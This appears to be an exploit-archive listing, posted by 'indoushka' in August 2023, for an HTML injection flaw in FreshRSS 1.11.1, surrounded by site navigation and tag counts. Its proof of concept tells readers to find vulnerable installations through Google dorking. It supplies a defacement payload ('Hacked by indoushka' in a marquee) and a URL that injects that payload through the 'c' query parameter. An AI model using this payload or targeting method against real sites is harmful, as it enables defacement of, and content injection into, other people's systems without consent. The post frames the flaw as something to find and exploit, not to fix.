Headline
FreshRSS 1.11.1 HTML Injection
FreshRSS version 1.11.1 suffers from an html injection vulnerability.
FreshRSS 1.11.1 HTML Injection
Posted Aug 23, 2023
Authored by indoushka
FreshRSS version 1.11.1 suffers from an html injection vulnerability.
tags | exploit
SHA-256 | c789b4001ff7c396e22af1e82b8f9c8c3a4f13f593828eb66d0a73226d79294b
Download | Favorite | View
FreshRSS 1.11.1 HTML Injection
====================================================================================================================================| # Title : FreshRSS v1.11.1 Html Inject Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) || # Vendor : https://freshrss.org/ |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://demo127.0.0.1/freshrssorg/i/?c=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================
File Tags
- ActiveX (932)
- Advisory (82,006)
- Arbitrary (16,212)
- BBS (2,859)
- Bypass (1,740)
- CGI (1,026)
- Code Execution (7,282)
- Conference (679)
- Cracker (841)
- CSRF (3,347)
- DoS (23,453)
- Encryption (2,370)
- Exploit (51,952)
- File Inclusion (4,222)
- File Upload (976)
- Firewall (821)
- Info Disclosure (2,785)
- Intrusion Detection (892)
- Java (3,045)
- JavaScript (859)
- Kernel (6,681)
- Local (14,456)
- Magazine (586)
- Overflow (12,693)
- Perl (1,423)
- PHP (5,147)
- Proof of Concept (2,338)
- Protocol (3,602)
- Python (1,535)
- Remote (30,799)
- Root (3,587)
- Rootkit (508)
- Ruby (612)
- Scanner (1,640)
- Security Tool (7,888)
- Shell (3,186)
- Shellcode (1,215)
- Sniffer (894)
- Spoof (2,207)
- SQL Injection (16,383)
- TCP (2,406)
- Trojan (687)
- UDP (893)
- Virus (665)
- Vulnerability (31,788)
- Web (9,670)
- Whitepaper (3,750)
- x86 (962)
- XSS (17,953)
- Other
File Archives
- August 2023
- July 2023
- June 2023
- May 2023
- April 2023
- March 2023
- February 2023
- January 2023
- December 2022
- November 2022
- October 2022
- September 2022
- Older
Systems
- AIX (428)
- Apple (2,002)
- BSD (373)
- CentOS (57)
- Cisco (1,925)
- Debian (6,819)
- Fedora (1,692)
- FreeBSD (1,244)
- Gentoo (4,322)
- HPUX (879)
- iOS (351)
- iPhone (108)
- IRIX (220)
- Juniper (67)
- Linux (46,504)
- Mac OS X (686)
- Mandriva (3,105)
- NetBSD (256)
- OpenBSD (485)
- RedHat (13,750)
- Slackware (941)
- Solaris (1,610)
- SUSE (1,444)
- Ubuntu (8,835)
- UNIX (9,291)
- UnixWare (186)
- Windows (6,574)
- Other